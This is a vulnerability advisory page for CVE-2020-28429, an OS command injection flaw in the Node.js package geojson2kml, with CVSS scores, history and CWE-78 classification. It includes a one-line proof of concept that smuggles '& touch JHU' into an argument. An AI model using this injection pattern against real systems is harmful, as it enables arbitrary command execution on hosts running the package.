CVE-2020-28429

All versions of package geojson2kml are vulnerable to Command Injection via the index.js file. PoC: var a =require("geojson2kml"); a("./","& touch JHU",function(){})
References
Link Resource
https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412 Exploit Third Party Advisory
https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412 Exploit Third Party Advisory
Configurations

Configuration 1 (hide)

cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:*

History

21 Nov 2024, 05:22

Type Values Removed Values Added
CVSS v2 : 7.5
v3 : 9.8
v2 : 7.5
v3 : 7.3
References () https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412 - Exploit, Third Party Advisory () https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412 - Exploit, Third Party Advisory

Information

Published : 2021-02-23 15:15

Updated : 2024-11-21 05:22


NVD link : CVE-2020-28429

Mitre link : CVE-2020-28429

CVE.ORG link : CVE-2020-28429


JSON object : View

Products Affected

geojson2kml_project

  • geojson2kml
CWE
CWE-78

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')